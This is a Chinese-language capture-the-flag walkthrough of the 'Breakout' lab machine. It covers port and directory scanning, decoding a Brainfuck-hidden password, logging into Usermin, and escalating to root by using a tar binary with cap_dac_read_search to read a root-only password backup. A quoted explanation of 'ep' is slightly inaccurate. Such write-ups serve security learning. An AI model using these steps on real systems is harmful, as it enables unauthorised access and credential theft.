靶機breakout

breakout

nmap收集

內網掃描

nmap -sn 192.168.1.0/24

Nmap scan report for 192.168.1.103
Host is up (0.000070s latency).
MAC Address: 00:0C:29:02:95:61 (VMware)

深入資訊收集

nmap -T4 -sV -p- -A 192.168.1.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-09 09:54 CST
Nmap scan report for 192.168.1.103
Host is up (0.00023s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
|_http-title: 200 — Document follows
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
|_http-title: 200 — Document follows
|_http-server-header: MiniServ/1.830
MAC Address: 00:0C:29:02:95:61 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

Host script results:
| smb2-time: 
|   date: 2024-03-09T01:54:31
|_  start_date: N/A
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

TRACEROUTE
HOP RTT     ADDRESS
1   0.23 ms 192.168.1.103

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.74 seconds

發現開放了80、139、445、10000、20000

網頁目錄爆破

公式化先爆網頁目錄

 gobuster dir -u 192.168.1.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.103
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,js,sh,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 11159]
/.html                (Status: 403) [Size: 278]
/manual               (Status: 301) [Size: 315] [--> http://192.168.1.103/manual/]
/.html                (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================
                                                                 

dirsearch -u http://192.168.1.103/  -s 1 -t 10

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 10 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.1.103/-_24-03-09_09-57-57.txt

Error Log: /root/.dirsearch/logs/errors-24-03-09_09-57-57.log

Target: http://192.168.1.103/

[09:57:57] Starting: 
[09:58:55] 403 -  278B  - /.ht_wsr.txt                                     
[09:58:56] 403 -  278B  - /.htaccess.bak1
[09:58:56] 403 -  278B  - /.htaccess.orig
[09:58:56] 403 -  278B  - /.htaccess.sample
[09:58:56] 403 -  278B  - /.htaccess.save
[09:58:56] 403 -  278B  - /.htaccess_extra
[09:58:57] 403 -  278B  - /.htaccess_orig
[09:58:57] 403 -  278B  - /.htaccess_sc
[09:58:57] 403 -  278B  - /.htaccessBAK
[09:58:57] 403 -  278B  - /.htaccessOLD
[09:58:57] 403 -  278B  - /.htaccessOLD2
[09:58:57] 403 -  278B  - /.htm                                            
[09:58:57] 403 -  278B  - /.html
[09:58:58] 403 -  278B  - /.htpasswd_test
[09:58:58] 403 -  278B  - /.htpasswds
[09:58:58] 403 -  278B  - /.httr-oauth
[10:09:30] 200 -   11KB - /index.html                                       
[10:10:44] 301 -  315B  - /manual  ->  http://192.168.1.103/manual/         
[10:10:44] 200 -  676B  - /manual/index.html
[10:13:32] 403 -  278B  - /server-status                                    
[10:13:32] 403 -  278B  - /server-status/

解碼

分別訪問了一下都沒有什麼收穫

檢視index.html原始碼，發現藏東西了

查詢後得知是Brainf*ck編碼

原碼：
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

解碼：
.2uqPEfj3D<P'a-3
意義不詳，但是很有強密碼的味道

登入後臺

訪問10000、20000埠，分別是兩個網頁服務的登入端，結合之前的index.html藏的東西，感覺是個可登入的網頁

之前nmap中掃出來有samba、webmin服務，使用enum4linux指令碼進行列舉

enum4linux -a 192.168.1.103

發現本地使用者cyber，嘗試配合之前的強密碼登入，發現usermin成功登入

反彈shell

發現有命令列可以使用，寫反彈shell

後面看著別人wp來了

一通操作下來只在原目錄下找到了一個user.txt，開啟來看也沒有什麼，看了別人的wp才知道後面該怎麼走

當前目錄下發現tar

檢視tar可執行檔案能力

getcap tar
tar cap_dac_read_search=ep


（解釋來自GPT）
在 Linux 中，cap_dac_read_search 是一種能力（capability），用於授予程序在執行期間具有讀取和搜尋檔案系統的能力，即使程序沒有使用者的許可權也可以執行這些操作。ep 可能代表著“Effective Permission”（有效許可權）的意思，這意味著程序能夠有效地讀取和搜尋檔案系統。

然後在/var/backups目錄發現密碼備份檔案，但是隻能是root使用者讀寫

那就由之前的tar可任意檔案讀取來讀取其中內容

cyber@breakout:~$ ./tar -cf pass.tar /var/backups/.old_pass.bak
./tar -cf pass.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names

cyber@breakout:~$ tar -xf pass.tar
tar -xf pass.tar

cyber@breakout:~$ cat var/backups/.old_pass.bak
cat var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h

提權成功

各種目錄下找東西真的很抓狂，以為是指令碼跑漏洞提權，原來可以直接找到密碼答案。

後續學到了用指令碼跑敏感目錄，學習到了